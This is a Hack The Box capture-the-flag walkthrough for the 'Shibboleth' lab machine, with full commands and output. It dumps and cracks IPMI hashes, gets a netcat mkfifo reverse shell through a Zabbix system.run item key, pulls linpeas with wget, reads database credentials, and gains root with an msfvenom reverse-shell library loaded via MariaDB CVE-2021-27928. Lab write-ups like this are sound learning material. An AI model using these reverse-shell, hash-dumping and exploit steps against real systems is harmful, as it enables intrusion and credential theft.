Shibboleth Write Up — Hack the box
8 min readDec 20, 2021
Nmap
┌──(arjun㉿kali)-[~/Desktop/htb/machines/shibboleth]
└─$ cat nmap/shibboleth.nmap
# Nmap 7.91 scan initiated Sun Nov 21 00:52:50 2021 as: nmap -sS -sC -sV -oA nmap/shibboleth 10.10.11.124
Nmap scan report for 10.10.11.124
Host is up (0.55s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://shibboleth.htb/
Service Info: Host: shibboleth.htb
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Nov 21 00:53:21 2021 -- 1 IP address (1 host up) scanned in 31.68 secondsNmap scan revealed that only one port is open and is redirecting to http://shibboleth.htb. Let’s add this domain to our /etc/hosts file.
There is not much information so let’s run Nmap to scan all the ports.A new port [port 623] was open so let’s run the Nmap again on that specific port to find the service and version running on that port
┌──(arjun㉿kali)-[~/Desktop/htb/machines/shibboleth]
└─$ sudo nmap -sU -sC -sV -p623 10.10.11.124
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-23 06:24 EST
Nmap scan report for shibboleth.htb (10.10.11.124)
Host is up (0.34s latency).
PORT STATE SERVICE VERSION
623/udp open asf-rmcp
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port623-UDP:V=7.91%I=7%D=11/23%Time=619CCF90%P=x86_64-pc-linux-gnu%r(ip
SF:mi-rmcp,1E,"\x06\0\xff\x07\0\0\0\0\0\0\0\0\0\x10\x81\x1cc\x20\x008\0\x0
SF:1\x97\x04\x03\0\0\0\0\t");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.01 secondsasf-rmcp service is running on port 623
Web enumeration
Let’s take a look at the website
The footer gives us some information about zabbix
After a quick google search about Zabbix, we can find that it was an open-source network and application monitoring tool. More information can be found on their website i.e https://www.zabbix.com/
We can start fuzzing directory using gobuster but there was nothing much
┌──(arjun㉿kali)-[~/Desktop/htb/machines/shibboleth/web]
└─$ gobuster dir -w /opt/SecLists/Discovery/Web-Content/raft-small-directories.txt -u http://shibboleth.htb -o shibboleth
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://shibboleth.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/raft-small-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/11/23 05:37:36 Starting gobuster in directory enumeration mode
===============================================================
/assets (Status: 301) [Size: 317] [--> http://shibboleth.htb/assets/]
/forms (Status: 301) [Size: 316] [--> http://shibboleth.htb/forms/]
--------snip----------We didn't get much information .Let's fuzz VHOST using ffuf
└─$ ffuf -u 'http://shibboleth.htb/' -H "Host: FUZZ.shibboleth.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -mc 200
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://shibboleth.htb/
:: Wordlist : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.shibboleth.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200
________________________________________________
monitor [Status: 200, Size: 3686, Words: 192, Lines: 30]
monitoring [Status: 200, Size: 3686, Words: 192, Lines: 30]
zabbix [Status: 200, Size: 3686, Words: 192, Lines: 30]
:: Progress: [4989/4989] :: Job [1/1] :: 126 req/sec :: Duration: [0:00:42] :: Errors: 0 ::There are three virtual hosts, let's add them to hosts file
VHOST
All three of them is redirected to same login page. Default credentials didn't work
Port 623 enumeration
On remote host there was another port i.e 623(udp) running an Alert Standard Format (ASF) device that can be controlled emotely using Remote Management and Control Protocol (RMCP). More info can be found on https://en.wikipedia.org/wiki/Alert_Standard_Format
After some googling we can find about ipmi at https://book.hacktricks.xyz/pentesting/623-udp-ipmi
Using Metasploit, we can scan for additional information i.e., we can check whether it is vulnerable for cipher zero
msf6 > search ipmi
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ipmi/ipmi_cipher_zero 2013-06-20 normal No IPMI 2.0 Cipher Zero Authentication Bypass Scanner
1 auxiliary/scanner/ipmi/ipmi_dumphashes 2013-06-20 normal No IPMI 2.0 RAKP Remote SHA1 Password Hash Retrieval
2 auxiliary/scanner/ipmi/ipmi_version normal No IPMI Information Discovery
3 exploit/multi/upnp/libupnp_ssdp_overflow 2013-01-29 normal No Portable UPnP SDK unique_service_name() Remote Code Execution
4 auxiliary/scanner/http/smt_ipmi_cgi_scanner 2013-11-06 normal No Supermicro Onboard IPMI CGI Vulnerability Scanner
5 auxiliary/scanner/http/smt_ipmi_49152_exposure 2014-06-19 normal No Supermicro Onboard IPMI Port 49152 Sensitive File Exposure
6 auxiliary/scanner/http/smt_ipmi_static_cert_scanner 2013-11-06 normal No Supermicro Onboard IPMI Static SSL Certificate Scanner
7 exploit/linux/http/smt_ipmi_close_window_bof 2013-11-06 good Yes Supermicro Onboard IPMI close_window.cgi Buffer Overflow
8 auxiliary/scanner/http/smt_ipmi_url_redirect_traversal 2013-11-06 normal No Supermicro Onboard IPMI url_redirect.cgi Authenticated Directory Traversal
Interact with a module by name or index. For example info 8, use 8 or use auxiliary/scanner/http/smt_ipmi_url_redirect_traversal
msf6 > use 0
msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > set RHOSTS 10.10.11.124
RHOSTS => 10.10.11.124
msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > run
[*] Sending IPMI requests to 10.10.11.124->10.10.11.124 (1 hosts)
[+] 10.10.11.124:623 - IPMI - VULNERABLE: Accepted a session open request for cipher zero
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completedIt is vulnerable to cipher zero. let’s dump the user hash
msf6 auxiliary(scanner/ipmi/ipmi_cipher_zero) > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set RHOSTS 10.10.11.124
RHOSTS => 10.10.11.124
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run[+] 10.10.11.124:623 - IPMI - Hash found: Administrator:2fe3f04982050000744fe26c7c83b789b44c5de39c1930f9f246411b15918ddad2a64c16d1926548a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:e825eb0fe28d22ccb4b20bd8b65a181da3ce07b6-------- snip-----
now let's crack the hash using hash cat
└─$ hashcat -m 7300 hash /opt/rockyou.txt
hashcat (v6.1.1) starting...OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-5200U CPU @ 2.20GHz, 1399/1463 MB (512 MB allocatable), 2MCUMinimum password length supported by kernel: 0
Maximum password length supported by kernel: 256Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-SaltATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.Host memory required for this attack: 64 MBDictionary cache hit:
* Filename..: /opt/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 1434438444b44d0882010000abf3b8306f2693ce4903d2c995f166373ef521f72f9172d2e08e4fe4e41e1e05a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:e5ca3708e74db3d676ee14fc61af488815f8416c:ilovepumkinpie1
---------------------snip--------
we successfully crack the pasword
└─$ hashcat -m 7300 hash /opt/rockyou.txt --show
44b44d0882010000abf3b8306f2693ce4903d2c995f166373ef521f72f9172d2e08e4fe4e41e1e05a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:e5ca3708e74db3d676ee14fc61af488815f8416c:ilovepumkinpie1credentials = Administrator:ilovepumkinpie1We can use this credentials to log in in the website
At the end of the page there is a zabbix version
After reading the documentation of Zabbix, we find that, we can run remote command using Zabbix agent via item keys. You can find more from this link: https://www.zabbix.com/documentation/current/manual/config/items/itemtypes/zabbix_agent
getting shell
- From dashboard go to, configuration>hosts> item
- Click on create item
- set key value as: system.run[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc "your-i" "port" >/tmp/f &,nowait]
- Set up nc listener
- Click test> get value and test
┌──(arjun㉿kali)-[~/Desktop/htb/machines/shibboleth/web]
└─$ nc -lnvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.11.124.
Ncat: Connection from 10.10.11.124:50082.
sh: 0: can't access tty; job control turned off
$ id
uid=110(zabbix) gid=118(zabbix) groups=118(zabbix)
$ python3 -c "import pty;pty.spawn('/bin/bash')"
zabbix@shibboleth:/$now we have reverse shell
Privilege Escalation
first lets run linpeas.sh
- on host machine run simple http server on folder containing linpeas script using following command : python3 -m http.server 80
on victim machine download the linpeas - wget "http://10.10.16.21/linpeas.sh" -o /tmp/linpeas.sh
- chmod +x linpeas.sh
- ./linpeas.sh
privilege escalation to ipmi-svc
There is another user called ipmi-svc. This user is using the same password we got before. i.e ilovepumkinpie1
While enumerating we can find /etc/zabbix/zabbix_server.conf file .This file contains the db name, db user and password
-----snip-----
### Option: DBName
# Database name. es
# Default:
# DBName=
DBName=zabbix
### Option: DBSchema
#Schema name. Used for PostgreSQL.
# Mandatory: no
# Default:
# DBSchema=
### Option: DBUser
#Database user.
# Mandatory: no
# Default:
# DBUser=
DBUser=zabbix
### Option: DBPassword
# Database password.
# Comment this line if no password is used.
# Mandatory: no
# Default:
DBPassword=bloooarskybluh
------snip----databse credentials:
DBName=zabbix
DBUser=zabbix
DBPassword=bloooarskybluh
Now let's take a look on database
ipmi-svc@shibboleth:/etc/zabbix$ mysql -D zabbix -u zabbix -p
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 1019
Server version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [zabbix]>MariaDB version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04 was running on host
hashes found on user tables
MariaDB [zabbix]> select alias, passwd from users;
+---------------+--------------------------------------------------------------+
| alias | passwd |
+---------------+--------------------------------------------------------------+
| Admin | $2y$10$L9tjKByfruByB.BaTQJz/epcbDQta4uRM/KySxSZTwZkMGuKTPPT2 |
| guest | $2y$10$89otZrRNmde97rIyzclecuk6LwKAsHN0BcvoOKGjbT.BwMBfm7G06 |
| Administrator | $2y$10$FhkN5OCLQjs3d6C.KtQgdeCc485jKBWPW4igFVEgtIP3jneaN7GQe |
+---------------+--------------------------------------------------------------+it is some variation of bcrypt hashes so let’s not to crack them
getting root
after a quick google search on mariadb version i found a vulnerability CVE-2021-27928
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27928
the POC can be found at https://github.com/Al1ex/CVE-2021-27928
*crafting exploit
┌──(arjun㉿kali)-[~/Desktop/htb/machines/shibboleth]
└─$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.16.21 LPORT=1236 -f elf-so -o CVE-2021-27928.so
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf-so file: 476 bytes
Saved as: CVE-2021-27928.so- transfer the exploit to victim device
- set up nc listener
- connect to mysql:
mysql -D zabbix -u zabbix -p
ipmi-svc@shibboleth:~$ mysql -D zabbix -u zabbix -p
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 1510
Server version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.- execute the following command on database:
SET GLOBAL wsrep_provider="/home/ipmi-svc/CVE-2021-27928.so";
MariaDB [zabbix]> SET GLOBAL wsrep_provider="/home/ipmi-svc/CVE-2021-27928.so";
ERROR 2013 (HY000): Lost connection to MySQL server during query
MariaDB [zabbix]>now we are root
